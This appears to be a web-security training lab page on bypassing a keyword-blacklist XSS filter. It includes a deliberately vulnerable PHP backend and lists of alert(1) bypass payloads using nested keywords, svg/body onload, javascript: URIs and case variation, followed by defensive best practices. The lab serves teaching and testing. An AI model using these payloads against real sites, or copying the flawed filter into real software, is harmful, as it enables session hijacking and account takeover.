Blacklist Filter XSS Lab

Test XSS with blacklist-based filtering on id and search parameters

Blacklist Filter Challenge

Lab Overview

This lab demonstrates a common vulnerability where parameters use blacklist filtering to block specific XSS payloads. The 'id' and 'search' parameters filter out specific words but may still be vulnerable to bypass techniques.

Blacklist Filtering: The id and search parameters use str_replace() to remove specific dangerous words: 'script', 'img', 'image', 'onfocus'.
Hidden Parameters: There are hidden parameters not shown in the main form. Use tools like Arjun to discover them!
# use arjun tool to find hidden parameters
Parameter Security Levels:
Secure fname, lname - Uses htmlspecialchars()
Partially Secure id, search - Uses blacklist filtering
Common Mistake Blacklist filtering can often be bypassed
Context Output context affects exploitability
Filtering Comparison:
Secure Parameters (fname, lname):
Input: <script>alert(1)</script>
Output: &lt;script&gt;alert(1)&lt;/script&gt;
Blacklist Filtered (id, search):
Input: <script>alert(1)</script>
Output: <>alert(1)</>
Bypass Attempt:
Input: <scrscriptipt>alert(1)</scrscriptipt>
Output: <script>alert(1)</script>
The blacklist filter removes specific words, but can be bypassed with techniques like double encoding or using alternative tags/events.
Overall Security Level: Medium Vulnerability

Objective: Discover the hidden id and search parameters and bypass the blacklist filtering to execute XSS payloads.

Backend Source Code 
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
elseif(isset($_GET["id"])){
    $arr = array('script','img','image','onfocus');
    $re = str_replace($arr, '', $_GET['id']);
    echo $re;
}
elseif(isset($_GET["search"])){
    $arr = array('script','img','image','onfocus');
    $re = str_replace($arr, '', $_GET['search']);
    echo $re;
}
Test Input Forms
Visible Parameters (HTML Encoded)
This parameter uses htmlspecialchars() encoding
This parameter uses htmlspecialchars() encoding
Hidden Parameters (Blacklist Filtered)
Hint: The 'id' and 'search' parameters are not shown in the main form but are implemented in the backend with blacklist filtering.
This parameter uses blacklist filtering - removes 'script', 'img', 'image', 'onfocus'
This parameter uses blacklist filtering - removes 'script', 'img', 'image', 'onfocus'
XSS Bypass Techniques for Blacklist Filters
Double Encoding Bypass:
  • <scrscriptipt>alert(1)</scrscriptipt>
  • <imimgg src=x onerror=alert(1)>
  • <imimaggge src=x onerror=alert(1)>
Alternative Tags/Events:
  • <svg onload=alert(1)>
  • <body onload=alert(1)>
  • <iframe src=javascript:alert(1)>
Case Variation Bypass:
  • <SCRIPT>alert(1)</SCRIPT>
  • <ScRiPt>alert(1)</ScRiPt>
  • <IMG src=x onerror=alert(1)>
Alternative Techniques:
  • <object data="javascript:alert(1)"></object>
  • <embed src="javascript:alert(1)"></embed>
  • <marquee onstart=alert(1)></marquee>
Blacklist Filter Analysis:

The current filter removes these exact strings: 'script', 'img', 'image', 'onfocus'

This means any of these techniques can bypass the filter:

  • Using alternative tags that aren't in the blacklist (svg, iframe, object, embed)
  • Using alternative event handlers that aren't in the blacklist (onload, onerror, onmouseover)
  • Using case variations (ScRiPt, IMG)
  • Using double encoding (scrscriptipt)
  • Using HTML entities or URL encoding
Security Implications

Blacklist filtering demonstrates:

  • Blacklists are inherently incomplete and can be bypassed
  • Attackers only need to find one unblocked vector
  • Case sensitivity issues in filtering implementations
  • New HTML tags and events are constantly being added
  • Whitelist approaches are more secure than blacklists
  • Context-aware encoding is more reliable than keyword filtering
Best Practices

For secure web applications:

  • Use whitelist validation instead of blacklists
  • Apply context-aware output encoding
  • Implement strict Content Security Policy (CSP) headers
  • Validate input based on expected data types
  • Use security libraries/frameworks for output encoding
  • Test with automated and manual security testing
  • Assume blacklists will be bypassed
Real-World Attack Scenarios
Common Blacklist Bypass Vectors:
  • Search forms: Search parameters often use blacklist filtering
  • ID parameters: Often overlooked in security implementations
  • Contact forms: Various fields may have inconsistent filtering
  • URL parameters: Often used for tracking with minimal validation
Impact of Blacklist Bypass:
  • Complete application compromise despite filtering
  • Session hijacking through cookie theft
  • Account takeover attacks
  • Phishing attacks from within the application
  • Defacement of application content
Prevention Strategies:
  • Whitelist validation: Only allow known-safe characters/patterns
  • Output encoding: Always encode before output based on context
  • Content Security Policy: Implement strict CSP headers
  • Security testing: Test all parameters with bypass techniques